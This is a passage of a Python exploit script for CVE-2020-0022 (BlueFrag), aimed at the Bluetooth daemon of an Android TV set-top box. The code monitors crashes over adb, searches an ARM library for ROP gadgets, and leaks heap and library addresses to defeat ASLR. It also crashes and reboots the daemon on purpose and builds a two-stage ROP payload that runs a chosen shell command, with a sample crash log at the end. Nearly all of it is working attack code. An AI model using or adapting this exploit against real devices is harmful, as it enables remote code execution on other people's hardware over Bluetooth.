    adb_target_rebooting = True

    # Wait 3 seconds to make sure adb get full logcat
    time.sleep(3)

    # Disconnect all sockets
    do_disconnect_all()

    # Reboot the target
    print_console ("ADB: Sending \"adb shell reboot\" command to target...", end="\r")
    do_execute_adb_shell_cmd("reboot", timeout=60)

    # Wait at least max_adb_wait_time_reboot seconds to make sure target has rebooted
    wait_counter = 0
    while True:
        time.sleep(1)
        wait_counter += 1
        print_console ("ADB: Waiting for target to reboot (%d seconds remaining)" % (max_adb_wait_time_reboot - wait_counter), end="\r")
        # Check wait time
        if wait_counter >= max_adb_wait_time_reboot:
            break

    # Initialize all variables
    hci_echo = False
    hci_handle = False
    hci_socket = False
    hci_l2cap_socket = False
    hci_crashing_deamon = False
    hci_initialized = False
    hci_initialization_retry = 0
    hci_overflow_counter = 0
    hci_crash_counter = 0
    hci_connection_retry = 0
    adb_target_present = False
    adb_target_crashed = False
    adb_target_rebooting = True
    adb_target_need_reboot = False
    adb_interesting_crash = False
    adb_shell_retry = 0
    adb_get_logcat_retry = 0
    adb_logcat_crash_count = 0
    bluetooth_library_base_address = 0
    link_xmit_data_q_entry_address = 0
    second_payload_base = 0


# Read logcat from target
def adb_thread():
    global adb_target_present
    global adb_target_rebooting
    global adb_target_crashed
    global adb_interesting_crash
    global adb_logcat_crash_count
    global adb_target_need_reboot
    global adb_get_logcat_retry
    global max_adb_get_logcat_retry

    # Main thread loop
    while True:
        try:
            # Initialize variables
            logcat_crash = []
            deafbeef_found = False
            pc00_passed = False
            bad_crash_found = False
            recording_crash = False
            interesting_crash = False
            line_since_pc00_passed = 0

            # Check for target rebooting
            if adb_target_rebooting or adb_target_need_reboot:
                time.sleep(1)
                continue

            # Execute adb shell logcat in a subprocess
            process = subprocess.Popen(["adb", "shell", "logcat"], stdout=subprocess.PIPE, stderr=subprocess.STDOUT)

            # Read output of adb shell logcat command
            for logcat_line in iter(process.stdout.readline, ('' if os.name == 'posix' and sys.version_info[0] < 3 else b'')):

                # Check if device is authorized with adb
                if ('error: device unauthorized' if os.name == 'posix' and sys.version_info[0] < 3 else b'error: device unauthorized') in logcat_line:
                    # Increase logcat retry
                    adb_get_logcat_retry += 1
                    # Check number of getting logcat failed
                    if adb_get_logcat_retry > max_adb_get_logcat_retry:
                        print_console ("\033[;31mTarget not reacheable with adb shell\033[;0m\n\033[;33mKill adb server with adb kill-server\nReconnect target with adb connect %s:5555\033[;0m" % (target_ip))
                        os._exit(1)

                    # Wait a bit before retrying to get logcat
                    time.sleep(1)
                    break

                # Reset logcat retry
                adb_get_logcat_retry = 0

                # Check connection to target with adb
                if ('error: no devices' if os.name == 'posix' and sys.version_info[0] < 3 else b'error: no devices') in logcat_line:
                    # Target no more present
                    adb_target_present = False
                    break

                # Check if a crash appeared
                if ('Fatal signal' if os.name == 'posix' and sys.version_info[0] < 3 else b'Fatal signal') in logcat_line:
                    print_crash("#######################################################################################")
                    print_crash("Target crashed !!!\n")
                    print_crash("link transmit data buffer queue pointer: 0x%08x" % link_xmit_data_q_entry_address)
                    print_crash("Library base address: 0x%08x" % bluetooth_library_base_address)
                    # Set target crashed
                    adb_target_crashed = True
                    
                    # Start recording the crash
                    recording_crash = True

                    # Increase target crash count
                    adb_logcat_crash_count += 1

                    # Add the logcat line to the crash
                    logcat_crash.append(logcat_line.replace("\n", ""))
                    print_console ("\033[;31mADB: Bluetooth deamon crashed (%d/%d)\033[;0m" % (adb_logcat_crash_count, max_target_deamon_crash_count))

                # Check if recording a crash
                if recording_crash:

                    if ('c0de' if os.name == 'posix' and sys.version_info[0] < 3 else b'c0de') in logcat_line \
                    or ('dead' if os.name == 'posix' and sys.version_info[0] < 3 else b'dead') in logcat_line \
                    or ('list_free_node' if os.name == 'posix' and sys.version_info[0] < 3 else b'list_free_node') in logcat_line \
                    or ('fixed_queue_free' if os.name == 'posix' and sys.version_info[0] < 3 else b'fixed_queue_free') in logcat_line \
                    or (('DEBUG   :     r' if os.name == 'posix' and sys.version_info[0] < 3 else b'DEBUG   :     r') in logcat_line \
                    and (('0020' if os.name == 'posix' and sys.version_info[0] < 3 else b'0020') in logcat_line \
                    or ('5858' if os.name == 'posix' and sys.version_info[0] < 3 else b'5858') in logcat_line)):
                        # Set bad crash flag
                        bad_crash_found = True

                    # Check if we got the _Z11list_appendP6list_tPv function or <unknown> or <anonymous: in crash
                    if (('<unknown>' if os.name == 'posix' and sys.version_info[0] < 3 else b'<unknown>') in logcat_line \
                    and not ('<anonymous:' if os.name == 'posix' and sys.version_info[0] < 3 else b'<anonymous:') in logcat_line) \
                    or ('<anonymous:' if os.name == 'posix' and sys.version_info[0] < 3 else b'<anonymous:') in logcat_line \
                    or ('_Z11list_appendP6list_tPv' if os.name == 'posix' and sys.version_info[0] < 3 else b'_Z11list_appendP6list_tPv') in logcat_line \
                    or ('[anon:' if os.name == 'posix' and sys.version_info[0] < 3 else b'[anon:') in logcat_line \
                    or ('(deleted)' if os.name == 'posix' and sys.version_info[0] < 3 else b'(deleted)') in logcat_line:
                        # Set local and global intersting crash flags
                        interesting_crash = True
                        adb_interesting_crash = True
                        bad_crash_found = False

                    # Check if we passed "#00 pc" mark
                    if ('#00 pc' if os.name == 'posix' and sys.version_info[0] < 3 else b'#00 pc') in logcat_line:
                        # Set 01 pc line passed flag
                        pc00_passed = True
                        line_since_pc00_passed = 0

                    # Check if line starts with DEBUG
                    if ('DEBUG   :' if os.name == 'posix' and sys.version_info[0] < 3 else b'DEBUG   :') in logcat_line:
                         # Add the logcat line to the crash
                        logcat_crash.append(logcat_line.replace("\n", ""))

                    # Line don't starts with DEBUG so check if "#00 pc" mark already is passed => end of crash
                    elif pc00_passed:
                        # Check number of logcat lines since #00 pc mark passed
                        if line_since_pc00_passed >= 5:
                            # Print the crash
                            if interesting_crash:
                                print_console ("\033[;32mADB: Found interesting crash !!!\033[;0m")
                                print_crash("Found interesting crash")
                            elif bad_crash_found:
                                print_console ("\033[;31mADB: Found bad crash !!!\033[;0m")
                                print_crash("Found bad crash")
                            for line in logcat_crash:
                                print_crash(line)
                                if interesting_crash:
                                    print_console ("\033[;32m%s\033[;0m" % line)
                                elif bad_crash_found:
                                    print_console ("\033[;33m%s\033[;0m" % line)
                                else:
                                    print_console ("\033[;36m%s\033[;0m" % line)

                            # Reset vars
                            logcat_crash = []
                            pc00_passed = False
                            recording_crash = False
                            interesting_crash = False
                            bad_crash_found = False
                        else:
                            # Increase line count since #00 pc mark passed
                            line_since_pc00_passed += 1

                # Save the line in the logcat file
                print_logcat(logcat_line)

                # Check number of crash => Target need to reboot
                if disable_reboot:
                    # Check number of crash => Target need to reboot
                    if not disable_reboot and adb_logcat_crash_count >= max_target_deamon_crash_count and not recording_crash:
                        # Set target need reboot
                        adb_target_need_reboot = True
                        print_console ("\033[;31mADB: Bluetooth deamon crashed too many times\033[;0m\n\033[;33mTarget need to reboot\033[;0m")
                        break

        except:
            # Continue anyway
            import traceback; traceback.print_exc()
            time.sleep(1)


# Find a ROP gadget in a file 
def find_gadget(fname, gadget_arg):
    if os.path.isfile(fname+".gadgets.json"):
        print_console ("ROP: Searching gadget \"%s\" in cache file..." % (gadget_arg), end="\r")
        with open(fname+".gadgets.json", "r") as f:
            cache = json.loads(f.read())
            if gadget_arg in cache:
                print_console ("\033[;32mROP: Gadget found at 0x%08x\033[;0m" % cache[gadget_arg])
                return cache[gadget_arg]
    else:
        with open(fname+".gadgets.json", "w") as f:
            f.write("{}")

    #Load ELF
    print_console ("ROP: Reading %s file as ELF..." % (fname), end="\r")
    fd = open(fname, "rb")
    elf = elffile.ELFFile(fd)
    for i in xrange(elf.num_sections()):
        section = elf.get_section(i)
        if section.name == ".text":
            data = section.data()
            addr = section.header["sh_addr"]
            break

    #cleanup gadget
    gadget = gadget_arg.split(";")
    gadget = filter(lambda x: x.strip() != "", gadget)
    gadget = map(lambda x: x.strip(), gadget)

    #iterate over .text section
    i = 0
    md = cs.Cs(cs.CS_ARCH_ARM, cs.CS_MODE_ARM)
    while i < len(data):
        print_console ("ROP: Searching gadget \"%s\"... (%d/%d)" % (gadget_arg, i, len(data)), end="\r")
        asm = list(md.disasm(data[i:], addr+i))
        if len(asm) < len(gadget):
            i += 4
            continue

        #iterate over disassembled code
        for j in xrange(len(asm)):
            #search for gadget
            found = True
            for k in xrange(len(gadget)):
                instr = gadget[k]
                mnemonic = instr.split(" ")[0]
                op_str = " ".join(instr.split(" ")[1:])
                if mnemonic.strip() != asm[j+k].mnemonic.strip():
                    found = False
                    break
                elif mnemonic.strip() == "cbz" and op_str.strip().split(",")[0] == asm[j+k].op_str.strip().split(",")[0]:
                    pass
                elif op_str.strip() != asm[j+k].op_str.strip():
                    found = False
                    break
                else:
                    pass

            if found:
                print_console ("\033[;32mROP: Gadget found at 0x%08x\033[;0m" % i+(j*4)+addr)

                #save to cache
                with open(fname+".gadgets.json", "r") as f:
                    cache = json.loads(f.read())
                cache[gadget_arg] = i+(j*4)+addr
                with open(fname+".gadgets.json", "w") as f:
                    f.write(json.dumps(cache))

                return i+(j*4)+addr

        i += len(asm)*4
        
    print_console ("\033[;31mROP: Failed to find gadget %s !!!\033[;0m" % gadget_arg)
    return False


################################################################################
# Start of main
################################################################################

if __name__ == "__main__":

    # Get the arguments
    if len(sys.argv) > 5:
        target_mac = sys.argv[1]
        target_ip = sys.argv[2]
        shell_command = sys.argv[3]
        disable_reboot = int(sys.argv[4], 0)
        verbose = int(sys.argv[5], 0)
        adb_activated = True
    elif len(sys.argv) > 4:
        target_mac = sys.argv[1]
        target_ip = sys.argv[2]
        shell_command = sys.argv[3]
        disable_reboot = int(sys.argv[4], 0)
        verbose = False
        adb_activated = True
    elif len(sys.argv) > 3:
        target_mac = sys.argv[1]
        target_ip = sys.argv[2]
        shell_command = sys.argv[3]
        disable_reboot = False
        verbose = False
        adb_activated = True
    elif len(sys.argv) > 2:
        target_mac = sys.argv[1]
        target_ip = sys.argv[2]
        shell_command = "cat /dev/zero | echo 'Target Exploited' > /sdcard/Download/cve-2020-0022-poc"
        disable_reboot = False
        verbose = False
        adb_activated = True
    elif len(sys.argv) > 1:
        target_mac = sys.argv[1]
        target_ip = ""
        shell_command = "cat /dev/zero | echo 'Target Exploited' > /sdcard/Download/cve-2020-0022-poc"
        disable_reboot = False
        verbose = False
        adb_activated = False
    else:
        print ("Usage: python polo_exploit.py target_bt_mac [target_adb_ip, shell_command, disable_reboot, verbose]")
        sys.exit(0)
    
    # Add a NULL byte at end of shell command
    shell_command += "\x00"
    
    # Make sure the shell command fill even number of words
    while len(shell_command) % 4 <> 0:
        shell_command += "\x00"
    
    # Check shell command length
    # Second payload is 184 characters = 46 bytes long
    # Current ROP chain take 20 bytes
    # Shell command can take 46 - 20 = 26 bytes = 104 characters
    if len(shell_command) > 104:
        print ("Usage: python polo_exploit.py target_bt_mac [target_adb_ip, shell_command, disable_reboot, verbose]")
        print ("Length of shell command can't exceed 103 characters...")
        sys.exit(0)
    
    # Clear the screen if not verbose mode
    if not verbose:
        os.system('clear')

    # Create and open the log file
    cwd = os.getcwd()
    if not os.path.isdir(cwd + "/logs"):
        os.mkdir(cwd + "/logs")
    log_filename = cwd + "/logs/log_exploit_" + datetime.datetime.now().strftime("%d-%m-%Y_%H-%M-%S.log")
    if os.path.exists(log_filename):
        log_filename = cwd + "/logs/log_exploit_" + datetime.datetime.now().strftime("%d-%m-%Y_%H-%M-%S_1.log")
    log_file = open(log_filename, "w")
    full_log_filename = cwd + "/logs/log_full_exploit_" + datetime.datetime.now().strftime("%d-%m-%Y_%H-%M-%S.log")
    if os.path.exists(full_log_filename):
        full_log_filename = cwd + "/logs/log_full_exploit_" + datetime.datetime.now().strftime("%d-%m-%Y_%H-%M-%S_1.log")
    full_log_file = open(full_log_filename, "w")

    # Create the loggers for stdout and stderr
    sys.stdout = LoggerWriter(log_file, full_log_file)
    if not verbose:
        sys.stderr = LoggerWriter(log_file, full_log_file)

    # Print hello and tips
    print_console ("\033[;32mBbox Miami exploit by polo35\033[;0m")
    print_console ("\033[;34mMake sure the target is associated via bluetooth with your smartphone before continuing\033[;0m")
    raw_input_console("Press any key to start the exploit")
    
    # Check adb activated
    if adb_activated:
        print_console ("\033[;32mUsing cve-2020-0022 vulnerability on target ip %s / mac %s / disable reboot: %d / verbose: %d\033[;0m" % (target_ip, target_mac, disable_reboot, verbose))
        print_console ("Saving log to %s" % log_filename)
        print_console ("Saving full log to %s" % full_log_filename)

        # Create and open the adb logcat file
        output_filename = cwd + "/logs/logcat_exploit_" + datetime.datetime.now().strftime("%d-%m-%Y_%H-%M-%S.log")
        if os.path.exists(output_filename):
            output_filename = cwd + "/logs/logcat_exploit_" + datetime.datetime.now().strftime("%d-%m-%Y_%H-%M-%S_1.log")
        print_console ("Saving adb logcat to %s" % output_filename)
        adb_logcat_file = open(output_filename, "w")

        # Create and open the adb crash file
        output_filename = cwd + "/logs/logcat_crash_exploit_" + datetime.datetime.now().strftime("%d-%m-%Y_%H-%M-%S.log")
        if os.path.exists(output_filename):
            output_filename = cwd + "/logs/logcat_crash_exploit_" + datetime.datetime.now().strftime("%d-%m-%Y_%H-%M-%S_1.log")
        print_console ("Saving adb logcat crash to %s" % output_filename)
        adb_logcat_crash_file = open(output_filename, "w")

        # Try to connect target with adb
        print_console ("ADB: Connecting target %s on port 5555..." % target_ip, end="\r")
        if do_adb_connect(target_ip):
            # Set target present
            adb_target_present = True
            print_console ("\033[;32mADB: Connected to target %s\033[;0m" % target_ip)

            # Start the adb thread
            start_new_thread(adb_thread, ())

            # Wait 5 seconds for adb thread to receive the full logcat
            print_console ("ADB: Checking previous crash in target logcat...", end="\r")
            time.sleep(5)

            # Check if there is crash
            if adb_logcat_crash_count:
                # Found a crash
                print_console ("\033[;31mADB: Target already crashed before exploit !!!\033[;0m")
                if not disable_reboot:
                    # Reboot the target to begin with a fresh memory map
                    print_console ("\033[;33mRebooting the target with adb...\033[;0m")
                    # Reboot the target
                    do_adb_reboot_target()

        else:
            adb_activated = False
            print_console ("\033[;31mADB: Failed to connect to target %s !!!\033[;0m" % target_ip)
    else:
        print_console ("\033[;32mUsing cve-2020-0022 vulnerability on target mac %s / disable_reboot: %d / verbose: %d\033[;0m" % (target_mac, disable_reboot, verbose))
        print_console ("Saving log to %s" % log_filename)
        print_console ("Saving full log to %s" % full_log_filename)

    # Start the bluetooth communication thread
    start_new_thread(hci_thread, ())
    
################################################################################
# Start of main script loop
################################################################################
    
    while True:

        # Check crash counter
        if not disable_reboot and hci_crash_counter >= max_target_deamon_crash_count:
            print_console ("\033[;31mHCI: Bluetooth deamon crashed too many times\033[;0m")
            # Check if adb target is connected
            if adb_activated and adb_target_present:
                print_console ("\033[;33mRebooting the target with adb...\033[;0m")
                # Reboot the target
                do_adb_reboot_target()
                continue
            else:
                # Nothing to do
                print_console ("\033[;33mRestart the box and retry\033[;0m")
                sys.exit(0)

        # Check connection counter
        if not disable_reboot and hci_connection_retry > max_hci_connection_retry:
            print_console ("\033[;31mHCI: Bluetooth deamon not reachable\033[;0m")
            # Check if adb target is connected
            if adb_activated and adb_target_present:
                print_console ("\033[;33mRebooting the target with adb...\033[;0m")
                # Reboot the target
                do_adb_reboot_target()
                continue
            else:
                # Nothing to do
                print_console ("\033[;33mRestart the box and retry\033[;0m")
                sys.exit(0)

        # Check connection counter
        if hci_overflow_counter >= max_hci_overflow_count:
            print_console ("\033[;31mHCI: Overflow failed...\033[;0m")
            # Crash the bluetooth deamon
            do_crash_bluetooth_deamon()
            continue

        # Check if adb is activated and target is not ready
        if adb_activated and not check_target_ready():

            # Try to connect target with adb
            if do_adb_connect(target_ip):
                # Print message if needed
                if not adb_target_present:
                    print_console ("\033[;32mADB: Connected to target %s\033[;0m" % target_ip)
                # Set target present
                adb_target_present = True
            else:
                # Reset target present
                adb_target_present = False

            # Check if target need reboot (abd thread saw too many crashs)
            if not disable_reboot and adb_target_need_reboot:
                # Check target present
                if adb_target_present:
                    # Check if adb target is connected
                    if adb_activated and adb_target_present:
                        print_console ("\033[;33mRebooting the target with adb...\033[;0m")
                        # Reboot the target
                        do_adb_reboot_target()
                        continue
                else:
                    # Something wrong happen with abd...
                    print_console ("\033[;31mADB: Target no more present while trying to reboot it...\033[;0m")
                    sys.exit(0)
                continue
                
            # Reset target need reboot
            adb_target_need_reboot = False

            # Check target rebooting
            if adb_target_rebooting:
                # Check target present
                if adb_target_present:
                    # Reset target rebooting
                    adb_target_rebooting = False
                else:
                    # Wait for adb to connect target
                    time.sleep(1)
                    wait_counter += 1
                    print_console ("ADB: Waiting for target to reboot%s" % ("."*(wait_counter%20)), end="\r")
                    # Check wait time
                    if wait_counter >= max_adb_wait_time_reboot:
                        print_console ("\033[;31mADB: Target don't wake up\nCheck WTF !!!\033[;0m")
                        sys.exit(0)
                    continue

            # Check target not present
            if not adb_target_present:
                # Wait for adb to connect target
                time.sleep(1)
                wait_counter += 1
                print_console ("ADB: Waiting for target to be present... %d seconds remaining" % (max_adb_wait_time_connect - wait_counter), end="\r")
                # Check wait time
                if wait_counter >= max_adb_wait_time_connect:
                    print_console ("\033[;31mADB: Target don't wake up\nCheck WTF !!!\033[;0m")
                    sys.exit(0)
                continue
            wait_counter = 0

        # Initialize hci
        if not do_initialize_hci():
            # Wait a bit before retrying
            time.sleep(2)
            # Count number of hci initialization retry
            hci_initialization_retry += 1
            if hci_initialization_retry >= max_hci_initialization_retry:
                print_console ("\033[;31mHCI: Enable to initialize hci... (%d/%d)\033[;0m" % (hci_initialization_retry, max_hci_initialization_retry))
                # Check if adb target is connected
                if adb_activated and adb_target_present:
                    # Check reboot disabled
                    if not disable_reboot:
                        print_console ("\033[;33mRebooting the target with adb...\033[;0m")
                        # Reboot the target
                        do_adb_reboot_target()
                        continue
                    else:
                        # Nothing to do
                        print_console ("\033[;33mRestart the box and retry\033[;0m")
                        sys.exit(0)
                else:
                    # Nothing to do
                    print_console ("\033[;31mHCI: Bluetooth deamon not reachable\033[;0m\n\033[;33mRestart the box and retry\033[;0m")
                    sys.exit(0)
            else:
                print_console ("\033[;31mHCI: Enable to initialize hci... (%d/%d)\033[;0m" % (hci_initialization_retry, max_hci_initialization_retry))
                continue

        # Reset vars
        hci_connection_retry = 0
        adb_target_crashed = False
        adb_interesting_crash = False
        hci_initialization_retry = 0

        # Check if target is ready for exploit
        if not check_target_ready():
            print_console ("\033[;31mTarget no more ready for exploit before getting link transmit data buffer queue pointer...\033[;0m")
            continue

        # Check if we already got the link transmit data buffer queue pointer
        if not link_xmit_data_q_entry_address:
            # Get memory leak at mem_offset 180 to get at least 1 link transmit data buffer queue pointer
            print_console ("HCI: Getting link transmit data buffer queue pointer...")
            malformed_echo, link_xmit_data_q_entry_pointers = do_leak_address("A", 180)

            # Check if we got at least 1 link transmit data buffer queue pointer
            if len(link_xmit_data_q_entry_pointers):
                # We got a link transmit data buffer queue address take the first one
                link_xmit_data_q_entry_address = link_xmit_data_q_entry_pointers[0]
                
                # Print found link transmit data buffer queue pointers
                for i in xrange(len(link_xmit_data_q_entry_pointers) - 1):
                    print_console ("\033[;32mFound link transmit data buffer queue pointer %d at 0x%08x\033[;0m" % (i, link_xmit_data_q_entry_pointers[i]))
            else:
                if malformed_echo:
                    print_console ("\033[;31mHCI: No exploitable link transmit data buffer queue pointer found\nNothing can be done here...\033[;0m")
                    sys.exit(0)
                else:
                    # Check adb activated
                    if adb_activated:
                        # No exploitable link transmit data buffer queue pointer found at mem_offset 180 => crash the bluetooth deamon
                        print_console ("\033[;31mHCI: No exploitable link transmit data buffer queue pointer found\033[;0m")
                        
                        # Dump leaks at near mem_offset and save it to leaks file
                        # do_dump_leaks(28, 10)
                        
                        # Crash the bluetooth deamon
                        do_crash_bluetooth_deamon()
                        continue
                    else:
                        print_console ("\033[;31mHCI: No exploitable link transmit data buffer queue pointer found\nNothing can be done here...\033[;0m")
                        sys.exit(0)

        # Check if target is ready for exploit
        if not check_target_ready():
            print_console ("\033[;31mTarget no more ready for exploit before getting library base address...\033[;0m")
            continue
        
        # Check if we already got the bluetooth library base address
        if not bluetooth_library_base_address:
            # Get memory leaks at mem_offset 28
            print_console ("HCI: Getting bluetooth library function pointers...")
            malformed_echo, function_pointers = do_leak_address("B", 28)

            # Check if we got at least 1 address in the leaked address list
            if len(function_pointers):

                # Loop all address in the leaked address list
                # Search address ending with 0xB29 for SetDataAdvDataSender function and 0x429 for bte_hh_evt function
                bte_hh_evt_address = 0
                set_data_adv_data_sender_address = 0
                for pointer in function_pointers:
                    # Check if we get a pointer to SetDataAdvDataSender function (Ends with 0xb29)
                    if pointer & 0xfff == 0xb29:
                        # Compute bluetooth.marvellberlin.so base address 
                        set_data_adv_data_sender_address = pointer
                        print_console ("\033[;32mHCI: Found SetDataAdvDataSender function at 0x%08x\033[;0m" % set_data_adv_data_sender_address)

                    # Check if we get a pointer to bte_hh_evt function (Ends with 0xb29)
                    if pointer & 0xfff == 0x429:
                        # Compute bluetooth.marvellberlin.so base address 
                        bte_hh_evt_address = pointer
                        print_console ("\033[;32mHCI: Found bte_hh_evt function at 0x%08x\033[;0m" % bte_hh_evt_address)
                
                # Check if we found the 2 function that the base is the same
                if set_data_adv_data_sender_address and bte_hh_evt_address:
                    # Compute base address from both found address
                    library_base_address1 = set_data_adv_data_sender_address - 0xd5b29
                    library_base_address2 = bte_hh_evt_address - 0x78429
                    
                    # Check that the 2 base address are the same
                    if library_base_address1 == library_base_address2:
                        bluetooth_library_base_address = library_base_address1
                    
                    # Something is wrong with function address ...
                    else:
                        # Check adb activated
                        if adb_activated:
                            # No exploitable pointer found at mem_offset 0 => crash the bluetooth deamon
                            print_console ("\033[;31mHCI: Found unexploitable bluetooth library pointer found\033[;0m")
                            
                            # Dump leaks at near mem_offset and save it to leaks file
                            # do_dump_leaks(28, 10)

                            # Crash the bluetooth deamon
                            do_crash_bluetooth_deamon()
                            continue
                        else:
                            print_console ("\033[;31mHCI: Found unexploitable bluetooth library pointer found\nNothing can be done here...\033[;0m")
                            sys.exit(0)

                # Check if we found SetDataAdvDataSender address
                elif set_data_adv_data_sender_address:
                    bluetooth_library_base_address = set_data_adv_data_sender_address - 0xd5b29
                    
                # This mean that we found bte_hh_evt address
                elif bte_hh_evt_address:
                    bluetooth_library_base_address = bte_hh_evt_address - 0x78429

                # Something is wrong with function address ...
                else:
                    # Check adb activated
                    if adb_activated:
                        # No exploitable pointer found at mem_offset 0 => crash the bluetooth deamon
                        print_console ("\033[;31mHCI: Found unexploitable bluetooth library pointer found\033[;0m")
                        
                        # Dump leaks at near mem_offset and save it to leaks file
                        # do_dump_leaks(28, 10)

                        # Crash the bluetooth deamon
                        do_crash_bluetooth_deamon()
                        continue
                    else:
                        print_console ("\033[;31mHCI: Found unexploitable bluetooth library pointer found\nNothing can be done here...\033[;0m")
                        sys.exit(0)
                    
                print_console ("\033[;32mHCI: Found bluetooth library base address at 0x%08x\033[;0m" % bluetooth_library_base_address)

            # No address leaked this time...
            else:
                if malformed_echo:
                    print_console ("\033[;31mHCI: No exploitable bluetooth library pointer found\nNothing can be done here...\033[;0m")
                    sys.exit(0)
                else:
                    # Check adb activated
                    if adb_activated:
                        # No exploitable pointer found at mem_offset 0 => crash the bluetooth deamon
                        print_console ("\033[;31mHCI: No exploitable library pointer found\033[;0m")
                        
                        # Dump leaks at near mem_offset and save it to leaks file
                        # do_dump_leaks(28, 10)

                        # Crash the bluetooth deamon
                        do_crash_bluetooth_deamon()
                        continue
                    else:
                        print_console ("\033[;31mHCI: No exploitable bluetooth library pointer found\nNothing can be done here...\033[;0m")
                        sys.exit(0)

        # Check if target is ready for exploit
        if not check_target_ready():
            print_console ("\033[;31mTarget no more ready for exploit after getting bluetooth library base address...\033[;0m")
            continue

        #######################################
        # ROP CHAIN
        #######################################
        
        # Build the payloads
        print_console ("Building the payloads...")

        # Reset payload variables
        first_payload_ptr = []
        second_payload_ptr = []
        
        # Helper function to keep track of pointers and offset
        def set_ptr(payload_ptr, pos, x, payload):
            if pos % 4 != 0:
                print_console ("\033[;31mInvalid pos %x\033[;00m" % pos)
                raise
            pos /= 4

            # First payload max length = 32 characters
            # Second payload max length = 184 characters
            if (payload == 1 and pos > 32/4) \
            or (payload == 2 and pos > 184/4):
                print_console ("\033[;31mInvalid pos %x\033[;00m" % pos)
                raise

            if len(payload_ptr) < pos + 1:
                payload_ptr += [False] * (1 + pos - len(payload_ptr))

            if payload_ptr[pos]:
                print_console ("\033[;31mCollision for offset %x\033[;00m" % (pos*8))
                raise

            payload_ptr[pos] = x
            return payload_ptr

        """
        The exploit starts with a controlled branch to R1 in list_append function because we overwrite the list_t* p_lcb->link_xmit_data_q object with the memcpy of -2 length of the first payload
        
        The target crash with following log:
        
        HCI: Got ACL connection handle: 0xb                                                                                                                             
        HCI: Getting link transmit data buffer queue pointer...
        HCI: Found link transmit data buffer queue at 0xa458dbc4
        HCI: Getting bluetooth library function pointers...
        HCI: Found SetDataAdvDataSender function at 0x8a4a3b29
        HCI: Found bluetooth library base address at 0x8a3ce000
        Building the payloads...
        First payload:
          0x00: 0xdead0000 | 0x04: 0xdead0001 | 0x08: 0xdead0002 | 0x0c: 0xa458dbc4
          0x10: 0xdead0003 | 0x14: 0xdead0004 | 0x18: 0xdead0005 | 0x1c: 0xdead0006
        Second payload:
          0x00 : 0xa458dbc4: 0xdead0007 | 0xa458dbc8: 0xdead0008 | 0xa458dbcc: 0xdead0009 | 0xa458dbd0: 0xdead000a
          0x10 : 0xa458dbd4: 0xdead000b | 0xa458dbd8: 0xdead000c | 0xa458dbdc: 0xdead000d | 0xa458dbe0: 0xdead000e
          0x20 : 0xa458dbe4: 0xdead000f | 0xa458dbe8: 0xdead0010 | 0xa458dbec: 0xdead0011 | 0xa458dbf0: 0xdead0012
          0x30 : 0xa458dbf4: 0xdead0013 | 0xa458dbf8: 0xdead0014 | 0xa458dbfc: 0xdead0015 | 0xa458dc00: 0xdead0016
          0x40 : 0xa458dc04: 0xdead0017 | 0xa458dc08: 0xdead0018 | 0xa458dc0c: 0xdead0019 | 0xa458dc10: 0xdead001a
          0x50 : 0xa458dc14: 0xdead001b | 0xa458dc18: 0xdead001c | 0xa458dc1c: 0xdead001d | 0xa458dc20: 0xdead001e
          0x60 : 0xa458dc24: 0xdead001f | 0xa458dc28: 0xdead0020 | 0xa458dc2c: 0xdead0021 | 0xa458dc30: 0xdead0022
          0x70 : 0xa458dc34: 0xdead0023 | 0xa458dc38: 0xdead0024 | 0xa458dc3c: 0xdead0025 | 0xa458dc40: 0xdead0026
          0x80 : 0xa458dc44: 0xdead0027 | 0xa458dc48: 0xdead0028 | 0xa458dc4c: 0xdead0029 | 0xa458dc50: 0xdead002a
          0x90 : 0xa458dc54: 0xdead002b | 0xa458dc58: 0xdead002c | 0xa458dc5c: 0xdead002d | 0xa458dc60: 0xdead002e
          0xa0 : 0xa458dc64: 0xdead002f | 0xa458dc68: 0xdead0030 | 0xa458dc6c: 0xdead0031 | 0xa458dc70: 0xdead0032
          0xb0 : 0xa458dc74: 0xdead0033 | 0xa458dc78: 0xdead0034
        Prepare to connect to the target via bluetooth with your smartphone
        HCI: Spraying second payload at 0xa458dbc4
        Connect to the target via bluetooth with your smartphone                                                                                                        
        HCI: Triggering the exploit with first payload... (1/3)
        ADB: Bluetooth deamon crashed (3/20)                                                                                                                            
        ADB: Found interesting crash !!!
        07-20 09:28:01.020 20972 21006 F libc    : Fatal signal 11 (SIGSEGV), code 1, fault addr 0xdead0032 in tid 21006 (bt_workqueue)
        07-20 09:28:01.123 21061 21061 F DEBUG   : *** *** *** *** *** *** *** *** *** *** *** *** *** *** *** ***
        07-20 09:28:01.123 21061 21061 F DEBUG   : Build fingerprint: 'BouyguesTelecom/BouygtelTV/HMB4213H:8.0.0/CALIFORNIE/6.30.13:user/release-keys'
        07-20 09:28:01.123 21061 21061 F DEBUG   : Revision: '0'
        07-20 09:28:01.123 21061 21061 F DEBUG   : ABI: 'arm'
        07-20 09:28:01.123 21061 21061 F DEBUG   : pid: 20972, tid: 21006, name: bt_workqueue  >>> com.android.bluetooth <<<
        07-20 09:28:01.123 21061 21061 F DEBUG   : signal 11 (SIGSEGV), code 1 (SEGV_MAPERR), fault addr 0xdead0032
        07-20 09:28:01.123 21061 21061 F DEBUG   :     r0 00000008  r1 dead0033  r2 8970a200  r3 00000000
        07-20 09:28:01.123 21061 21061 F DEBUG   :     r4 a4585c38  r5 8970a200  r6 00000000  r7 00000000
        07-20 09:28:01.123 21061 21061 F DEBUG   :     r8 00000000  r9 891fd340  sl 891fd338  fp 00000001
        07-20 09:28:01.124 21061 21061 F DEBUG   :     ip a66aa0ec  sp 891fcfd8  lr 8a4f78e9  pc dead0032  cpsr 200f0030
        07-20 09:28:01.228 21061 21061 F DEBUG   : 
        07-20 09:28:01.228 21061 21061 F DEBUG   : backtrace:
        07-20 09:28:01.228 21061 21061 F DEBUG   :     #00 pc dead0032  <unknown>
        07-20 09:28:01.229 21061 21061 F DEBUG   :     #01 pc 001298e7  /system/vendor/lib/hw/bluetooth.marvellberlin.so (_Z11list_appendP6list_tPv+70)
        07-20 09:28:01.229 21061 21061 F DEBUG   :     #02 pc 0010312d  /system/vendor/lib/hw/bluetooth.marvellberlin.so (_Z24l2c_link_check_send_pktsP12t_l2c_linkcbP9t_l2c_ccbP6BT_HDR+36)
        07-20 09:28:01.229 21061 21061 F DEBUG   :     #03 pc 0010298f  /system/vendor/lib/hw/bluetooth.marvellberlin.so (_Z22l2c_link_hci_conn_comphtPh+78)
        07-20 09:28:01.229 21061 21061 F DEBUG   :     #04 pc 000e5371  /system/vendor/lib/hw/bluetooth.marvellberlin.so (_Z22btu_hcif_process_eventhP6BT_HDR+440)
